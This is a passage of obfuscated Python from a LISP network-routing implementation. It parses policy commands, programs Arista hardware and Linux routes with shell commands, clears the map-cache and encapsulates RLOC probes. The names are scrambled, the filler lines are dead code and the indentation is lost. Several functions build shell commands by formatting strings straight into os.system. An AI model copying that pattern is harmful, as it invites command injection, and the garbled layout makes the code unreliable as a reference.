if 19 - 19: II111iiii / i11iIiiIii * II111iiii + OoOoOO00 - OoOoOO00
if ( oO0OoO000oO0o == "set-source-eid" ) :
if ( iIIiiIi . set_source_eid == None ) :
iIIiiIi . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 7 - 7: OoOoOO00 - OoO0O00 % OoOoOO00 . I1ii11iIi11i % Oo0Ooo * iII111i
iIIiiIi . set_source_eid . store_prefix ( oOO0 )
if ( I1oO0 != None ) : iIIiiIi . set_source_eid . instance_id = I1oO0
if 90 - 90: IiII - OOooOOo + iIii1I11I1II1
if ( oO0OoO000oO0o == "set-destination-eid" ) :
if ( iIIiiIi . set_dest_eid == None ) :
iIIiiIi . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 88 - 88: ooOoO0o . o0oOOo0O0Ooo . OOooOOo - I11i
iIIiiIi . set_dest_eid . store_prefix ( oOO0 )
if ( I1oO0 != None ) : iIIiiIi . set_dest_eid . instance_id = I1oO0
if 76 - 76: IiII % I1IiiI . iII111i
if ( oO0OoO000oO0o == "set-rloc-address" ) :
iIIiiIi . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iIIiiIi . set_rloc_address . store_address ( oOO0 )
if 5 - 5: ooOoO0o . oO0o - OoOoOO00 - OoooooooOO
if ( oO0OoO000oO0o == "set-rloc-record-name" ) :
iIIiiIi . set_rloc_record_name = oOO0
if 2 - 2: OOooOOo
if ( oO0OoO000oO0o == "set-elp-name" ) :
iIIiiIi . set_elp_name = oOO0
if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
if ( oO0OoO000oO0o == "set-geo-name" ) :
iIIiiIi . set_geo_name = oOO0
if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
if ( oO0OoO000oO0o == "set-rle-name" ) :
iIIiiIi . set_rle_name = oOO0
if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
if ( oO0OoO000oO0o == "set-json-name" ) :
iIIiiIi . set_json_name = oOO0
if 78 - 78: OoO0O00 - i1IIi % I1Ii111
if ( oO0OoO000oO0o == "policy-name" ) :
iIIiiIi . policy_name = oOO0
if 87 - 87: I11i
if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
if 4 - 4: OOooOOo + II111iiii
if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
if 43 - 43: i11iIiiIii * I1IiiI
iIIiiIi . match_clauses = o00ooOO
iIIiiIi . save_policy ( )
return
if 48 - 48: Oo0Ooo - OOooOOo / iII111i % I1ii11iIi11i . OoOoOO00
if 6 - 6: i11iIiiIii
lisp_policy_commands = {
"lisp policy" : [ lisp_policy_command , {
"policy-name" : [ True ] ,
"match" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"source-eid" : [ True ] ,
"destination-eid" : [ True ] ,
"source-rloc" : [ True ] ,
"destination-rloc" : [ True ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"datetime-range" : [ True ] ,
"set-action" : [ False , "process" , "drop" ] ,
"set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
"set-instance-id" : [ True , 0 , 0xffffffff ] ,
"set-source-eid" : [ True ] ,
"set-destination-eid" : [ True ] ,
"set-rloc-address" : [ True ] ,
"set-rloc-record-name" : [ True ] ,
"set-elp-name" : [ True ] ,
"set-geo-name" : [ True ] ,
"set-rle-name" : [ True ] ,
"set-json-name" : [ True ] } ]
}
if 51 - 51: o0oOOo0O0Ooo - OoooooooOO - I11i % i11iIiiIii / I1IiiI + IiII
if 91 - 91: O0
if 13 - 13: o0oOOo0O0Ooo
if 15 - 15: iIii1I11I1II1 * Oo0Ooo . iIii1I11I1II1 . Ii1I % iII111i - i11iIiiIii
if 77 - 77: ooOoO0o - o0oOOo0O0Ooo * OoOoOO00 % oO0o
if 4 - 4: i11iIiiIii + OoOoOO00
if 45 - 45: ooOoO0o / OoooooooOO . Oo0Ooo
def lisp_send_to_arista ( command , interface ) :
interface = "" if ( interface == None ) else "interface " + interface
if 35 - 35: i11iIiiIii / o0oOOo0O0Ooo / oO0o / I11i . O0
oO0oiII = command
if ( interface != "" ) : oO0oiII = interface + ": " + oO0oiII
lprint ( "Send CLI command '{}' to hardware" . format ( oO0oiII ) )
if 65 - 65: IiII % I1IiiI % ooOoO0o / oO0o
Ii1I1IIiii = '''
enable
configure
{}
{}
''' . format ( interface , command )
if 97 - 97: I1IiiI % iII111i * oO0o - i1IIi
os . system ( "FastCli -c '{}'" . format ( Ii1I1IIiii ) )
return
if 7 - 7: oO0o / ooOoO0o / IiII - I1ii11iIi11i * IiII % O0
if 41 - 41: Ii1I + IiII / O0 . iIii1I11I1II1
if 71 - 71: oO0o / o0oOOo0O0Ooo % iIii1I11I1II1 * iIii1I11I1II1
if 29 - 29: ooOoO0o - OoOoOO00 - o0oOOo0O0Ooo
if 54 - 54: Ii1I + i11iIiiIii + i1IIi - OoooooooOO
if 100 - 100: oO0o . ooOoO0o
if 14 - 14: OoooooooOO + iII111i / iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1 - IiII
def lisp_arista_is_alive ( prefix ) :
oO00o00 = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
oOo0OOoooO = getoutput ( "FastCli -c '{}'" . format ( oO00o00 ) )
if 34 - 34: I1ii11iIi11i + i11iIiiIii - I1ii11iIi11i / OoOoOO00 + i1IIi . i11iIiiIii
if 48 - 48: I1ii11iIi11i % OoOoOO00 * OoOoOO00 % o0oOOo0O0Ooo * II111iiii / OoOoOO00
if 73 - 73: OoOoOO00 + OOooOOo * II111iiii . OOooOOo % I1Ii111 % oO0o
if 79 - 79: I1ii11iIi11i % I11i
oOo0OOoooO = oOo0OOoooO . split ( "\n" ) [ 1 ]
OoO0Oo0OoOo = oOo0OOoooO . split ( " " )
OoO0Oo0OoOo = OoO0Oo0OoOo [ - 1 ] . replace ( "\r" , "" )
if 52 - 52: i11iIiiIii % IiII - I1ii11iIi11i * Ii1I
if 27 - 27: ooOoO0o - IiII + iIii1I11I1II1 + Oo0Ooo + O0
if 42 - 42: OoO0O00 % I1Ii111 . I1ii11iIi11i + II111iiii . OoooooooOO
if 66 - 66: iII111i * O0 * OoO0O00 % II111iiii
return ( OoO0Oo0OoOo == "Y" )
if 39 - 39: i11iIiiIii * i1IIi . OoOoOO00 * Oo0Ooo / iIii1I11I1II1 . OoOoOO00
if 6 - 6: Ii1I / iII111i
if 69 - 69: iIii1I11I1II1 % I1Ii111 % OOooOOo + O0 - OoOoOO00 % oO0o
if 70 - 70: oO0o - I1IiiI + Ii1I
if 54 - 54: OoOoOO00 / ooOoO0o - I1IiiI
if 37 - 37: o0oOOo0O0Ooo
if 57 - 57: iII111i / i1IIi / i1IIi + IiII
if 75 - 75: IiII / O0
if 72 - 72: I11i
if 35 - 35: I11i % OoooooooOO / i1IIi * i1IIi / I1IiiI
if 42 - 42: I11i - i1IIi - oO0o / I11i + Ii1I + ooOoO0o
if 23 - 23: OoOoOO00 . oO0o - iII111i
if 27 - 27: Oo0Ooo * OOooOOo - OoOoOO00
if 1 - 1: II111iiii * i11iIiiIii . OoooooooOO
if 37 - 37: OoooooooOO + O0 . I11i % OoOoOO00
if 57 - 57: I1Ii111 . OOooOOo + I1Ii111 . iIii1I11I1II1 / oO0o / O0
if 88 - 88: I1Ii111
if 16 - 16: Oo0Ooo . ooOoO0o / OoO0O00 / o0oOOo0O0Ooo . OoooooooOO * OoO0O00
if 50 - 50: II111iiii + I11i . OoooooooOO . I1Ii111 - OOooOOo
if 83 - 83: oO0o
if 100 - 100: I1Ii111 + o0oOOo0O0Ooo * oO0o / oO0o . oO0o + iII111i
if 71 - 71: II111iiii + iII111i + O0 % Oo0Ooo / I1IiiI
if 52 - 52: Oo0Ooo . I1Ii111 * i1IIi / Oo0Ooo / OoO0O00
if 29 - 29: iII111i
if 91 - 91: Oo0Ooo - IiII
if 47 - 47: iII111i / OOooOOo + iII111i
if 69 - 69: I1IiiI . I1ii11iIi11i
if 18 - 18: I11i * I1IiiI
if 42 - 42: i1IIi . I1Ii111 - ooOoO0o + I11i / oO0o
if 60 - 60: i1IIi + OoooooooOO % i11iIiiIii / IiII % Oo0Ooo + I1IiiI
if 87 - 87: Ii1I % OoooooooOO % I1Ii111 * i11iIiiIii * OoOoOO00
if 78 - 78: I11i
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
if 80 - 80: OoO0O00 - i11iIiiIii / iII111i * I1ii11iIi11i / I1IiiI - I1Ii111
if 85 - 85: IiII
if 72 - 72: iII111i * OoOoOO00
if 65 - 65: iIii1I11I1II1 / iIii1I11I1II1 % O0 / II111iiii . OOooOOo . O0
if 65 - 65: I11i
if 35 - 35: o0oOOo0O0Ooo - i11iIiiIii
if 78 - 78: ooOoO0o - II111iiii - i1IIi
if 18 - 18: OoooooooOO % OoOoOO00 - IiII / oO0o . OOooOOo . I1IiiI
def lisp_program_vxlan_hardware ( mc ) :
if 77 - 77: I1ii11iIi11i . OoO0O00 / OoOoOO00 / O0
if 67 - 67: ooOoO0o % I11i % oO0o
if 74 - 74: II111iiii
if 44 - 44: Oo0Ooo + OoO0O00 + OoOoOO00 - I1IiiI
if 68 - 68: i11iIiiIii / OOooOOo . i1IIi . i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
if 31 - 31: ooOoO0o
if ( len ( mc . best_rloc_set ) == 0 ) : return
if 87 - 87: OoooooooOO + OOooOOo - I1ii11iIi11i / I1IiiI + ooOoO0o - Oo0Ooo
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
o0OOOooO = mc . eid . print_prefix_no_iid ( )
iIIiI11 = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 97 - 97: O0
if 95 - 95: OoO0O00 % iII111i / I1IiiI * OoooooooOO
if 31 - 31: iIii1I11I1II1
if 62 - 62: o0oOOo0O0Ooo - iII111i / II111iiii . o0oOOo0O0Ooo
ii11i11iiI = getoutput ( "ip route get {} | egrep vlan4094" . format ( o0OOOooO ) )
if 67 - 67: OoOoOO00 % iII111i . o0oOOo0O0Ooo / II111iiii * O0 / I1IiiI
if ( ii11i11iiI != "" ) :
lprint ( "Route {} already in hardware: '{}'" . format ( green ( o0OOOooO , False ) , ii11i11iiI ) )
if 20 - 20: oO0o * O0 - Ii1I + i11iIiiIii - OoOoOO00
return
if 18 - 18: I1ii11iIi11i . iII111i
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
I1II11IIIiI11 = getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
if ( I1II11IIIiI11 . find ( "vxlan" ) == - 1 ) :
lprint ( "No VXLAN interface found, cannot program hardware" )
return
if 65 - 65: I1Ii111 * I1ii11iIi11i
if ( I1II11IIIiI11 . find ( "vlan4094" ) == - 1 ) :
lprint ( "No vlan4094 interface found, cannot program hardware" )
return
if 54 - 54: ooOoO0o . i1IIi . OoooooooOO
IIIIiII = getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
if ( IIIIiII == "" ) :
lprint ( "No IP address found on vlan4094, cannot program hardware" )
return
if 2 - 2: OoOoOO00 . I1IiiI
IIIIiII = IIIIiII . split ( "inet " ) [ 1 ]
IIIIiII = IIIIiII . split ( "/" ) [ 0 ]
if 88 - 88: I1IiiI
if 34 - 34: ooOoO0o + I1Ii111 / iIii1I11I1II1 + Ii1I . o0oOOo0O0Ooo * OoO0O00
if 74 - 74: i1IIi / iIii1I11I1II1 . I1ii11iIi11i
if 71 - 71: ooOoO0o % ooOoO0o * iII111i / Ii1I * O0
if 21 - 21: o0oOOo0O0Ooo * o0oOOo0O0Ooo - OoOoOO00 % OoOoOO00
if 8 - 8: I1ii11iIi11i
if 5 - 5: OOooOOo * i11iIiiIii % oO0o * ooOoO0o
iII = [ ]
O000oOoo = getoutput ( "arp -i vlan4094" ) . split ( "\n" )
for IiiiI1 in O000oOoo :
if ( IiiiI1 . find ( "vlan4094" ) == - 1 ) : continue
if ( IiiiI1 . find ( "(incomplete)" ) == - 1 ) : continue
OoII1 = IiiiI1 . split ( " " ) [ 0 ]
iII . append ( OoII1 )
if 10 - 10: I1Ii111 / Ii1I + i11iIiiIii * I1Ii111 - OoOoOO00 / I1ii11iIi11i
if 78 - 78: oO0o % I11i - O0
OoII1 = None
ooO0oOOoOO = IIIIiII
IIIIiII = IIIIiII . split ( "." )
for iIi1iIIIiIiI in range ( 1 , 255 ) :
IIIIiII [ 3 ] = str ( iIi1iIIIiIiI )
IiI = "." . join ( IIIIiII )
if ( IiI in iII ) : continue
if ( IiI == ooO0oOOoOO ) : continue
OoII1 = IiI
break
if 35 - 35: OoooooooOO - II111iiii / o0oOOo0O0Ooo - o0oOOo0O0Ooo
if ( OoII1 == None ) :
lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
if 55 - 55: OoooooooOO / IiII + i1IIi
return
if 54 - 54: ooOoO0o * Ii1I / Ii1I
if 15 - 15: oO0o * I1Ii111
if 11 - 11: Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
if 87 - 87: OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: oO0o + OoOoOO00
if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
if 59 - 59: O0
OOooOOo0ooO00OO0 = iIIiI11 . split ( "." )
Oooo = lisp_hex_string ( OOooOOo0ooO00OO0 [ 1 ] ) . zfill ( 2 )
I1i11I111i = lisp_hex_string ( OOooOOo0ooO00OO0 [ 2 ] ) . zfill ( 2 )
I11iI1 = lisp_hex_string ( OOooOOo0ooO00OO0 [ 3 ] ) . zfill ( 2 )
iiiI1IiIIii = "00:00:00:{}:{}:{}" . format ( Oooo , I1i11I111i , I11iI1 )
ii1Ii1iII1iIi = "0000.00{}.{}{}" . format ( Oooo , I1i11I111i , I11iI1 )
i1I1iII1111II = "arp -i vlan4094 -s {} {}" . format ( OoII1 , iiiI1IiIIii )
os . system ( i1I1iII1111II )
if 72 - 72: IiII / II111iiii
if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
if 21 - 21: I1ii11iIi11i
if 60 - 60: i1IIi / OoO0O00 . Ii1I
Ii1III1 = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( ii1Ii1iII1iIi , iIIiI11 )
if 56 - 56: I1Ii111 % II111iiii
lisp_send_to_arista ( Ii1III1 , None )
if 11 - 11: i11iIiiIii / OoO0O00 * OoO0O00 . I1Ii111 - OOooOOo
if 12 - 12: OOooOOo . OoOoOO00 % ooOoO0o
if 100 - 100: OoOoOO00 . iII111i
if 50 - 50: iIii1I11I1II1 * OOooOOo . I1IiiI . OoOoOO00 - O0 + Oo0Ooo
if 89 - 89: IiII - iII111i + IiII
IIi11I1IIii = "ip route add {} via {}" . format ( o0OOOooO , OoII1 )
os . system ( IIi11I1IIii )
if 93 - 93: OoO0O00 . I1IiiI / I1Ii111 % iII111i
lprint ( "Hardware programmed with commands:" )
IIi11I1IIii = IIi11I1IIii . replace ( o0OOOooO , green ( o0OOOooO , False ) )
lprint ( " " + IIi11I1IIii )
lprint ( " " + i1I1iII1111II )
Ii1III1 = Ii1III1 . replace ( iIIiI11 , red ( iIIiI11 , False ) )
lprint ( " " + Ii1III1 )
return
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
def lisp_clear_hardware_walk ( mc , parms ) :
Oo0OoOI1I11iII1I1i = mc . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( Oo0OoOI1I11iII1I1i ) )
return ( [ True , None ] )
if 31 - 31: Ii1I
if 72 - 72: OOooOOo * Ii1I % OoO0O00
if 72 - 72: OoOoOO00 + o0oOOo0O0Ooo - i1IIi - OoO0O00 % OoOoOO00
if 42 - 42: oO0o / i1IIi . IiII
if 12 - 12: i11iIiiIii . ooOoO0o
if 80 - 80: O0 / iIii1I11I1II1 % iII111i * ooOoO0o / i11iIiiIii . OoOoOO00
if 88 - 88: OoooooooOO . I1IiiI
if 6 - 6: I1Ii111 - i11iIiiIii - oO0o
def lisp_clear_map_cache ( ) :
global lisp_map_cache , lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list , lisp_gleaned_groups
global lisp_no_map_request_rate_limit
if 7 - 7: i1IIi
iiIIIiII = bold ( "User cleared" , False )
O0oo0oOo = lisp_map_cache . cache_count
lprint ( "{} map-cache with {} entries" . format ( iiIIIiII , O0oo0oOo ) )
if 83 - 83: i11iIiiIii
if ( lisp_program_hardware ) :
lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
if 86 - 86: OoO0O00 * oO0o + ooOoO0o % iII111i
lisp_map_cache = lisp_cache ( )
if 81 - 81: i11iIiiIii . II111iiii * I11i + Ii1I / O0 . Oo0Ooo
if 29 - 29: IiII - IiII - OoooooooOO . Ii1I % OoooooooOO - OoOoOO00
if 33 - 33: oO0o * OoO0O00 / i11iIiiIii - I1IiiI * OoO0O00
if 19 - 19: OoooooooOO
lisp_no_map_request_rate_limit = lisp_get_timestamp ( )
if 34 - 34: OoOoOO00 . oO0o
if 53 - 53: oO0o + OoooooooOO * ooOoO0o
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
lisp_rloc_probe_list = { }
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 52 - 52: iIii1I11I1II1 + O0
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
if 63 - 63: ooOoO0o
lisp_rtr_list = { }
if 22 - 22: OOooOOo . i11iIiiIii + II111iiii - Oo0Ooo % i1IIi / o0oOOo0O0Ooo
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
lisp_gleaned_groups = { }
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo % o0oOOo0O0Ooo . Ii1I / OoooooooOO
if 23 - 23: oO0o * I1IiiI - oO0o - ooOoO0o . IiII / i11iIiiIii
if 53 - 53: Ii1I * Ii1I . OoOoOO00 . OOooOOo / I1ii11iIi11i % O0
if 98 - 98: OOooOOo
lisp_process_data_plane_restart ( True )
return
if 11 - 11: OOooOOo * iIii1I11I1II1 % IiII - I1IiiI . I11i
if 29 - 29: OOooOOo % I11i - OOooOOo - OOooOOo * I11i . oO0o
if 75 - 75: II111iiii . O0 . I1Ii111 * O0 / OoooooooOO
if 60 - 60: OOooOOo - Oo0Ooo * OOooOOo / OoO0O00
if 55 - 55: I1ii11iIi11i * II111iiii * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1 % I1ii11iIi11i . Ii1I + I1IiiI % i11iIiiIii - i11iIiiIii
if 62 - 62: I1Ii111 + I1IiiI
if 9 - 9: iIii1I11I1II1 / iIii1I11I1II1
if 24 - 24: OOooOOo . I1IiiI % i11iIiiIii
if 43 - 43: OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i + OoO0O00 . I1Ii111 . iII111i
if 1 - 1: iII111i / OoO0O00 / OoOoOO00 * Oo0Ooo * OoooooooOO
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
if ( len ( lisp_sockets ) != 4 ) : return
if 59 - 59: iII111i
IIIiiI11ii = lisp_myrlocs [ 0 ]
if 30 - 30: iII111i . OoO0O00 . i11iIiiIii / I1ii11iIi11i * Oo0Ooo
if 38 - 38: IiII + II111iiii
if 20 - 20: iII111i * I1IiiI * iII111i - o0oOOo0O0Ooo + i1IIi + ooOoO0o
if 49 - 49: II111iiii * I1IiiI / oO0o
if 50 - 50: Ii1I + O0 . I1IiiI * Oo0Ooo
i1iIii = len ( packet ) + 28
O0O = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( i1iIii ) , 0 , 64 ,
17 , 0 , socket . htonl ( IIIiiI11ii . address ) , socket . htonl ( rloc . address ) )
O0O = lisp_ip_checksum ( O0O )
if 15 - 15: Oo0Ooo
O0I1II1 = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
socket . htons ( i1iIii - 20 ) , 0 )
if 53 - 53: OoooooooOO * O0 / iII111i * ooOoO0o % I1Ii111 + OOooOOo
if 95 - 95: I1Ii111 % OoOoOO00 . IiII * iII111i % Ii1I
if 18 - 18: iIii1I11I1II1 / ooOoO0o / I1Ii111 % oO0o * Ii1I
if 14 - 14: oO0o
packet = lisp_packet ( O0O + O0I1II1 + packet )
if 72 - 72: iIii1I11I1II1 / II111iiii * II111iiii + I1IiiI + iIii1I11I1II1 + oO0o
if 46 - 46: I1Ii111
if 23 - 23: Oo0Ooo * IiII - I1Ii111 . OoooooooOO
if 78 - 78: OoOoOO00 - iIii1I11I1II1
packet . inner_dest . copy_address ( rloc )
packet . inner_dest . instance_id = 0xffffff
packet . inner_source . copy_address ( IIIiiI11ii )
packet . inner_ttl = 64
packet . outer_dest . copy_address ( rloc )
packet . outer_source . copy_address ( IIIiiI11ii )
packet . outer_version = packet . outer_dest . afi_to_version ( )
packet . outer_ttl = 64
packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT
if 20 - 20: i1IIi
IIIOo0O = red ( rloc . print_address_no_iid ( ) , False )
if ( nat_info ) :
oOOOo00000Oo = " {}" . format ( blue ( nat_info . hostname , False ) )
Oooooo0OOO = bold ( "RLOC-probe request" , False )
else :
oOOOo00000Oo = ""
Oooooo0OOO = bold ( "RLOC-probe reply" , False )
if 72 - 72: ooOoO0o . II111iiii
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( Oooooo0OOO , IIIOo0O , oOOOo00000Oo , packet . encap_port ) )
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
if 100 - 100: O0
if ( packet . encode ( None ) == None ) : return
packet . print_packet ( "Send" , True )
if 19 - 19: Ii1I * iIii1I11I1II1 * Oo0Ooo - i11iIiiIii * i11iIiiIii - OOooOOo
oooIIiI1iiIi1i = lisp_sockets [ 3 ]
packet . send_packet ( oooIIiI1iiIi1i , packet . outer_dest )
del ( packet )
return
if 82 - 82: I1ii11iIi11i . i1IIi + Ii1I
if 4 - 4: OoO0O00
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
def lisp_get_default_route_next_hops ( ) :
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
if 28 - 28: Ii1I - i11iIiiIii . oO0o / II111iiii
if ( lisp_is_macos ( ) ) :
oO00o00 = "route -n get default"
O0o000oo00o00 = getoutput ( oO00o00 ) . split ( "\n" )
Iio0o00oo0OoOo = i111IIiIiiI1 = None
for o0OoO0 in O0o000oo00o00 :
if ( o0OoO0 . find ( "gateway: " ) != - 1 ) : Iio0o00oo0OoOo = o0OoO0 . split ( ": " ) [ 1 ]
if ( o0OoO0 . find ( "interface: " ) != - 1 ) : i111IIiIiiI1 = o0OoO0 . split ( ": " ) [ 1 ]
if 74 - 74: OOooOOo + OoOoOO00 + OoooooooOO
return ( [ [ i111IIiIiiI1 , Iio0o00oo0OoOo ] ] )
if 81 - 81: OoO0O00 + OoO0O00
if 30 - 30: iIii1I11I1II1 . I1ii11iIi11i / OoOoOO00 * oO0o / O0 . o0oOOo0O0Ooo
if 47 - 47: i1IIi
if 61 - 61: OOooOOo * I1ii11iIi11i - ooOoO0o - Oo0Ooo + o0oOOo0O0Ooo . ooOoO0o
if 98 - 98: II111iiii
oO00o00 = "ip route | egrep 'default via'"
IIOoo0O = getoutput ( oO00o00 ) . split ( "\n" )
if 56 - 56: i1IIi % IiII / I1Ii111
Ii11i = [ ]
for ii11i11iiI in IIOoo0O :
if ( ii11i11iiI . find ( " metric " ) != - 1 ) : continue
iiiI1I = ii11i11iiI . split ( " " )
try :
IIIIII1I = iiiI1I . index ( "via" ) + 1
if ( IIIIII1I >= len ( iiiI1I ) ) : continue
O0OooOOO000 = iiiI1I . index ( "dev" ) + 1
if ( O0OooOOO000 >= len ( iiiI1I ) ) : continue
except :
continue
if 61 - 61: OoOoOO00 - I1Ii111 * ooOoO0o + Oo0Ooo / IiII
if 79 - 79: ooOoO0o % OoooooooOO
Ii11i . append ( [ iiiI1I [ O0OooOOO000 ] , iiiI1I [ IIIIII1I ] ] )
if 67 - 67: I1IiiI + OoooooooOO % OoO0O00 . OoooooooOO + I11i / oO0o
return ( Ii11i )
if 33 - 33: I1ii11iIi11i
if 5 - 5: O0
if 50 - 50: Oo0Ooo % IiII * oO0o
if 71 - 71: OoO0O00
if 64 - 64: OoO0O00 - I1ii11iIi11i % OoO0O00 + OoOoOO00 - Oo0Ooo * I1ii11iIi11i
if 78 - 78: I1Ii111 % OoO0O00 . IiII % iIii1I11I1II1 / OoO0O00
if 34 - 34: iIii1I11I1II1
def lisp_get_host_route_next_hop ( rloc ) :
oO00o00 = "ip route | egrep '{} via'" . format ( rloc )
ii11i11iiI = getoutput ( oO00o00 ) . split ( " " )
if 33 - 33: I1ii11iIi11i + I1Ii111 * ooOoO0o / i11iIiiIii
try : OOOooo0OooOoO = ii11i11iiI . index ( "via" ) + 1
except : return ( None )
if 83 - 83: oO0o
if ( OOOooo0OooOoO >= len ( ii11i11iiI ) ) : return ( None )
return ( ii11i11iiI [ OOOooo0OooOoO ] )
if 93 - 93: II111iiii
if 89 - 89: OoO0O00 % II111iiii % iII111i
if 66 - 66: OoooooooOO % iII111i % i11iIiiIii
if 35 - 35: OoooooooOO - IiII
if 38 - 38: I1Ii111 % I11i . I11i % I11i + OoOoOO00
if 79 - 79: I1ii11iIi11i + OoO0O00 * I1ii11iIi11i / I11i
if 13 - 13: OoOoOO00 . iII111i
def lisp_install_host_route ( dest , nh , install ) :
install = "add" if install else "delete"
iIiI1iIiII1 = "none" if nh == None else nh
if 11 - 11: Oo0Ooo - Ii1I / OoO0O00
lprint ( "{} host-route {}, nh {}" . format ( install . title ( ) , dest , iIiI1iIiII1 ) )
if 95 - 95: OoooooooOO
if ( nh == None ) :
O0Ooo0iII111III = "ip route {} {}/32" . format ( install , dest )
else :
O0Ooo0iII111III = "ip route {} {}/32 via {}" . format ( install , dest , nh )
if 64 - 64: I1ii11iIi11i . I1Ii111
os . system ( O0Ooo0iII111III )
return
